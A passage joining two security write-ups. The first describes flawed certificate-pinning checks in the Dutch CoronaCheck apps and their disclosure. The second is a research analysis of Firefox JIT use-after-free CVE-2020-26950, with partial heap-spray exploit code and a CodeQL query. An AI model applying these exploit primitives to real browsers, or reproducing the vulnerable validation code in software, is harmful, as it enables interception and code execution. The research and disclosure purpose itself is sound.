Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now, how to connect to them and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesn’t know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific person’s QR code is difficult.

Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued by a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must also be signed. This uses the PKCS#7 Cryptographic Message Syntax (CMS) format.

Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, these mistakes meant that only one implicit check on the certificate (performed by App Transport Security) was still effective. There was thus no certificate pinning at all, and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.

Certificate check issues

An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.

This was implemented as follows in SecurityStrategy.swift lines 203 to 262:

203 func checkSSL() {
204
205    guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206          let serverTrust = challenge.protectionSpace.serverTrust else {
207
208        logDebug("No security strategy")
209        completionHandler(.performDefaultHandling, nil)
210        return
211    }
212
213    let policies = [SecPolicyCreateSSL(true, challenge.protectionSpace.host as CFString)]
214    SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215    let certificateCount = SecTrustGetCertificateCount(serverTrust)
216
217    var foundValidCertificate = false
218    var foundValidCommonNameEndsWithTrustedName = false
219    var foundValidFullyQualifiedDomainName = false
220
221    for index in 0 ..< certificateCount {
222
223        if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224            let serverCert = Certificate(certificate: serverCertificate)
225
226            if let name = serverCert.commonName {
227                if name.lowercased() == challenge.protectionSpace.host.lowercased() {
228                    foundValidFullyQualifiedDomainName = true
229                    logVerbose("Host matched CN \(name)")
230                }
231                for trustedName in trustedNames {
232                    if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                        foundValidCommonNameEndsWithTrustedName = true
234                        logVerbose("Found a valid name \(name)")
235                    }
236                }
237            }
238            if let san = openssl.getSubjectAlternativeName(serverCert.data), !foundValidFullyQualifiedDomainName {
239                if compareSan(san, name: challenge.protectionSpace.host.lowercased()) {
240                    foundValidFullyQualifiedDomainName = true
241                    logVerbose("Host matched SAN \(san)")
242                }
243            }
244            for trustedCertificate in trustedCertificates {
245
246                if openssl.compare(serverCert.data, withTrustedCertificate: trustedCertificate) {
247                    logVerbose("Found a match with a trusted Certificate")
248                    foundValidCertificate = true
249                }
250            }
251        }
252    }
253
254    if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255        // all good
256        logVerbose("Certificate signature is good for \(challenge.protectionSpace.host)")
257        completionHandler(.useCredential, URLCredential(trust: serverTrust))
258    } else {
259        logError("Invalid server trust")
260        completionHandler(.cancelAuthenticationChallenge, nil)
261    }
262 }

If an app wants to implement additional verification checks, then it is common to start by performing the platform's own certificate validation. This also means that the certificate chain is resolved: the certificates received from the server may be incomplete or contain additional certificates, and by applying the platform verification, a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, while adding the root as the only trust anchor.

This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the “continue with the usual validation” result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks were not additions to the verification but replaced it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code of that validation was not checked, so an untrusted certificate was not rejected here.

The app performs three additional checks on the certificate:

  • It is issued by one of a list of root certificates (line 246).
  • It contains a Subject Alternative Name containing a specific domain (line 238).
  • It contains a Common Name containing a specific domain (lines 227 and 232).

For checking the root certificate, the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on the type of connection. Connections to the test providers are treated a bit more leniently, while the connection to the VWS servers itself needs to be issued by one specific root.

This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte; certificates are not very large, so this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those, which could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was instead based on two checks: comparing the serial number and comparing the “authority key information” extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the issuer's key, but it can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combined with the previous issue, this made it possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.

OpenSSL.m lines 144 to 227:

144 - (BOOL)compare:(NSData *)certificateData withTrustedCertificate:(NSData *)trustedCertificateData {
145
146	BOOL subjectKeyMatches = [self compareSubjectKeyIdentifier:certificateData with:trustedCertificateData];
147	BOOL serialNumbersMatches = [self compareSerialNumber:certificateData with:trustedCertificateData];
148	return subjectKeyMatches && serialNumbersMatches;
149 }
150
151 - (BOOL)compareSubjectKeyIdentifier:(NSData *)certificateData with:(NSData *)trustedCertificateData {
152
153	const ASN1_OCTET_STRING *trustedCertificateSubjectKeyIdentifier = NULL;
154	const ASN1_OCTET_STRING *certificateSubjectKeyIdentifier = NULL;
155	BIO *certificateBlob = NULL;
156	X509 *certificate = NULL;
157	BIO *trustedCertificateBlob = NULL;
158	X509 *trustedCertificate = NULL;
159	BOOL isMatch = NO;
160
161	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
162		EXITOUT("Cannot allocate certificateBlob");
163
164	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
165		EXITOUT("Cannot parse certificateData");
166
167	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
168		EXITOUT("Cannot allocate trustedCertificateBlob");
169
170	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
171		EXITOUT("Cannot parse trustedCertificate");
172
173	if (NULL == (trustedCertificateSubjectKeyIdentifier = X509_get0_subject_key_id(trustedCertificate)))
174		EXITOUT("Cannot extract trustedCertificateSubjectKeyIdentifier");
175
176	if (NULL == (certificateSubjectKeyIdentifier = X509_get0_subject_key_id(certificate)))
177		EXITOUT("Cannot extract certificateSubjectKeyIdentifier");
178
179	isMatch = ASN1_OCTET_STRING_cmp(trustedCertificateSubjectKeyIdentifier, certificateSubjectKeyIdentifier) == 0;
180
181 errit:
182	BIO_free(certificateBlob);
183	BIO_free(trustedCertificateBlob);
184	X509_free(certificate);
185	X509_free(trustedCertificate);
186
187	return isMatch;
188 }
189
190 - (BOOL)compareSerialNumber:(NSData *)certificateData with:(NSData *)trustedCertificateData {
191
192	BIO *certificateBlob = NULL;
193	X509 *certificate = NULL;
194	BIO *trustedCertificateBlob = NULL;
195	X509 *trustedCertificate = NULL;
196	ASN1_INTEGER *certificateSerial = NULL;
197	ASN1_INTEGER *trustedCertificateSerial = NULL;
198	BOOL isMatch = NO;
199
200	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
201		EXITOUT("Cannot allocate certificateBlob");
202
203	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
204		EXITOUT("Cannot parse certificate");
205
206	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
207		EXITOUT("Cannot allocate trustedCertificateBlob");
208
209	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
210		EXITOUT("Cannot parse trustedCertificate");
211
212	if (NULL == (certificateSerial = X509_get_serialNumber(certificate)))
213		EXITOUT("Cannot parse certificateSerial");
214
215	if (NULL == (trustedCertificateSerial = X509_get_serialNumber(trustedCertificate)))
216		EXITOUT("Cannot parse trustedCertificateSerial");
217
218	isMatch = ASN1_INTEGER_cmp(certificateSerial, trustedCertificateSerial) == 0;
219
220 errit:
221	if (certificateBlob) BIO_free(certificateBlob);
222	if (trustedCertificateBlob) BIO_free(trustedCertificateBlob);
223	if (certificate) X509_free(certificate);
224	if (trustedCertificate) X509_free(trustedCertificate);
225
226	return isMatch;
227 }

This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.

ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS, so we couldn't completely bypass the certificate validation. It could, however, still be exploitable in these scenarios:

  • A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (“Staat der Nederlanden Private Root CA - G1”). To actually use that root would require an ATS exception.
  • A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.

Other issues

We found a number of other issues in the verification of certificates. These are of lower impact.

Subject Alternative Names

In the past, the Common Name field was used to indicate for which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.

Obtaining the SANs from a certificate was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of name types other than a domain name, such as an email address in a certificate used for S/MIME. The parsing could be confused using specially formatted email addresses to make it match any domain name.

SecurityStrategy.swift lines 114 to 127:

114 func compareSan(_ san: String, name: String) -> Bool {
115
116    let sanNames = san.split(separator: ",")
117    for sanName in sanNames {
118        // SanName can be like DNS: *.domain.nl
119        let pattern = String(sanName)
120            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
121            .trimmingCharacters(in: .whitespacesAndNewlines)
122        if wildcardMatch(name, pattern: pattern) {
123            return true
124        }
125    }
126    return false
127 }

For example, an S/MIME certificate containing the email address "a,*,b"@example.com (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.

CMS signatures

The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name; instead, it checked that a specific string occurred in the domain (coronacheck.nl) and that it ended with a specific string (.nl). This means that an attacker with a certificate for coronacheck.nl.example.nl could also CMS-sign API responses.

OpenSSL.m lines 259 to 278:

259- (BOOL)validateCommonNameForCertificate:(X509 *)certificate
260                         requiredContent:(NSString *)requiredContent
261                          requiredSuffix:(NSString *)requiredSuffix {
262    
263    // Get subject from certificate
264    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);
265    
266    // Get Common Name from certificate subject
267    char certificateCommonName[256];
268    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
269    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];
270    
271    // Compare Common Name to required content and required suffix
272    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
273    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];
274    
275    certificateSubjectName = NULL;
276    
277    return hasCorrectSuffix && containsRequiredContent;
278}

The only issue we found in the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not anchored on the right, also making it possible to bypass it using coronacheck.nl.example.com.

SignatureValidator.kt lines 94 to 96:

94 fun cnMatching(substring: String): Builder {
95    return cnMatching(Regex(Regex.escape(substring)))
96 }

SignatureValidator.kt lines 142 to 149:

if (cnMatchingRegex != null) {
    if (!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any {
            val cn = IETFUtils.valueToString(it.first.value)
            cnMatchingRegex.containsMatchIn(cn)
        }) {
        throw SignatureValidationException("Signing certificate does not match expected CN")
    }
}

Because these certificates had to be issued under PKI-Overheid (a CA run by the Dutch government), it might not have been easy to obtain a certificate with such a domain name.

Race condition

We also found a race condition in the application of the certificate validation rules. As mentioned, the rules the app applied for certificate validation were stricter for VWS connections than for connections to test providers, and even among VWS connections there were different levels of strictness. However, if two requests were performed in quick succession, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this could not be used to intercept connections either. However, it was already being triggered in normal use, as the app initiates two requests with different validation rules immediately after starting.

Reporting

We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.

In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.

Developers are of course not required to keep us in the loop when we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.

Recommendation

TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.

Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.

Conclusion

We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.

Introduction

At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications and improvements to allocators, lazy generation, and garbage collection simply wasn’t enough to make it so. Fast forward to 2008 and Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp
ret

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which, compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge amount of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are compiled. Functions that run a lot (think 10,000 times or so) are ideal candidates and will make page loading significantly faster, even with the tradeoff of JIT compilation time.
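
As a rough sketch (illustrative code and call counts of our own, not engine-specific thresholds):

function add(x, y) {
    return x + y; // always called with Int32 arguments
}

// After enough hot iterations, the engine considers add() worth compiling
// and emits native code specialised for Int32 inputs.
for (let i = 0; i < 20000; i++) {
    add(i, 1);
}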

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i < 10) {
		return i + 1;
	}
	return i + 2;
}

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.
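
A concrete illustration of this aliasing (our own example, in the same spirit as the pseudocode above):

function f(o) {
    let a = o.x; // GetValue of o.x
    o.x = 5;     // Store to o.x - aliases with loads of o.x
    let b = o.x; // GetValue of o.x again - NOT redundant, since it now
                 // depends on the Store above rather than the first GetValue
    return a + b;
}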

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.
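
From script, this laziness is invisible but easy to trigger (a sketch of ours):

function f() {}

// Internally, f does not yet have a resolved prototype property.
// The first access below invokes the resolve hook, which defines
// the property and writes it into the function's slots.
let p = f.prototype;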

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:

Use-after-free

The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
 
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}
 
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}
 
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f) or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}
 
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}
 
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
 
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
 
   // Create an object to be read for the UAF
   var target = {};
    for (var i = 0; i < ...; i++) {
        ...
    }
 
    ...
}

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straightforward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.
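
In miniature, the nursery behaves like a bump allocator (illustrative pseudocode of ours, not Spidermonkey's actual implementation):

const nursery = { base: 0x10000n, offset: 0n, capacity: 0x100000n };

function nurseryAllocate(size) {
    size = BigInt(size);
    // Out of space: in the real engine this would trigger a minor GC
    if (nursery.offset + size > nursery.capacity) return null;
    const addr = nursery.base + nursery.offset;
    nursery.offset += size; // bump the offset to the next free spot
    return addr;
}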

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often come with a number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has less than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.
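
Forcing a slots array into such a Large allocation is then just a matter of defining enough properties (a sketch of ours; the exact property counts used in the exploit differ):

let obj = {};
// 256 or more slots pushes the slots backing store into a jemalloc
// "Large" allocation in the tenured heap.
for (let i = 0; i < 512; i++) {
    obj["p" + i] = i;
}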

Reallocating

In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
 
   new cons(); // Trigger the vulnerability - Reallocates the object slots
 
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
  
   // Avoid Elements Copy-On-Write by pushing a value
   target.push(i);
  
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
 
   // Return the corrupted array
   return target;
}
 
/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
 
   // We'll create one object...
   var cons = function() {};
   for(i=0; i < ...; i++) {
       ...
   }
 
   ...
}

